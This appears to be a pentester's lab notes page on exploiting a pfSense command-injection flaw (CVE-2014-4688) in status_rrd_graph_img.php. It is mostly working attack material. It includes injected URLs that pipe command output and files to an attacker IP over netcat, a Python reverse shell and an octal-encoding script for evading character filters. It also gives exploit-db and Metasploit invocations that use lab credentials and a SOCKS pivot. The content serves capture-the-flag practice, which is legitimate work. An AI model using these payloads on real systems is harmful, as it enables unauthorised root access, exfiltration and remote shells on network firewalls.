# PFSense ## Exec Code Exploit * **google**: pfsense cve * cvedetails.com * bright red ones for 'pfsense' * 'exec code' as indicator * Use: CVE-2014-4688 (only 6.5 score) * exploitdb: 43560 ..interesting * **google**: pfsense 2.1.3 changelog * Found: Nov 11, 2014 New Features * **google**: pfsense exploits ..find good blogpost * proteansec - pt4: directory traversal * proteansec - pt2: command injection * **status\_rrd\_graph\_img.php** ..still unpatched, we will use * REF: [ReverseShell](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#python), [LFI](https://pentest.mxhx.org/04-webapps/lfi), [CharEvasion](https://pentest.mxhx.org/03-getting-in/char-evasion-tricks) ## Mixed Results * Had trouble following these examples from ippsec ``` pfsense > status > RRD Graphs Cleanup the link: https://$IP/status_rrd.graph_img.php?database=system-processor.rrd https://$IP/status_rrd.graph_img.php?database=queues ..from exploit/blog https://$IP/status_rrd.graph_img.php?database=queues;sleep+10 ..worked! https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec ..ugly results https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000 .. queues;echo+whoami|nc+10.10.14.6+9000 .. root .. queues;echo+hostname|nc+10.10.14.6+9000 .. pfSense nc -nvlp 9001 ------------------------------ More: .. queues;echo+abc|nc+10.10.14.6+9000 ..works .. queues;find+/|nc+10.10.14.6+9000 ..fail ...find data in slash .. queues;find+.|nc+10.10.14.6+9000 ..ok nc -lvnp 9001 > filesystem.txt ..catch .. queues;echo+abc|nc+10.10.14.6+9000 ..ok .. queues;echo+abc/|nc+10.10.14.6+9000 ..fails (slash blocked) .. queues;env|nc+10.10.14.6+9000 ..get environment HOME=/ .. queues;echo+$(HOME)|nc+10.10.14.6+9000 ..get environment HOME=/ .. queues;FIND+$(HOME)|nc+10.10.14.6+9000 ..FIND / ..NOW WORKS .. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001 nc -lvnp 9001 > filesystem.txt grep root.txt filesystem.txt ------------------------------ reverse Python Reverse Shell vim cmd ..connect(("10.10.14.6",1234)) nc -nvlp 9001 < cmd ..send/share the file nc -nvlp 1234 ..catch shell ..queues;nc+10.10.10.6+9001|python+& ..fail ..queues;nc+10.10.10.6+9001|python ..ok pull file, python execute connected! ``` ## gobuster - 45 minutes ``` > gobuster dir -w medium.txt dir -u https://10.x.x.x -k -x php,txt,conf,bak /system-users.txt ..found username!!! ``` ## More Injections ``` https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt https://10.x.x.x/cmd.txt ..view results https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20 https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20 ``` ## Octal Code to Injection * If Dashes and Slashes are Blocked * Use Octal Encoding ``` #!/usr/bin/env python3 command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'" payload = "" for char in command: payload += ("\\" + oct(ord(char)).lstrip("0o")) print(payload) --------------------- Result: \160\171\164\150\... Verify: printf '\160\171\164\150\...' python -c 'import socket... worked! --------------------- Octal Injection! https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh ``` ## Easy Exploit * * ``` searchsploit -m php/webapps/43560.py exploit-db 43560 > python command injection script python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense nc -nvlp 4444 whoami ..root ``` ## Metasploit * Plus Socks pivot from another box (since we were banned) ``` service postgresql start msfconsole search pfsense graph injection locate pfsense_graph use exploit/unix/http/pfsense_graph_injection_exec set RHOST $IP set USERNAME rohit set PASSWORD pfsense set LHOST tun0 set Proxies socks5:127.0.0.1:1080 set ReverseAllowProxy true exploit m> shell m> hostname ``` ## Advanced * [BruteCSRFPython](https://pentest.mxhx.org/05-passwords-ciphers/hydra#brute-csrf-python)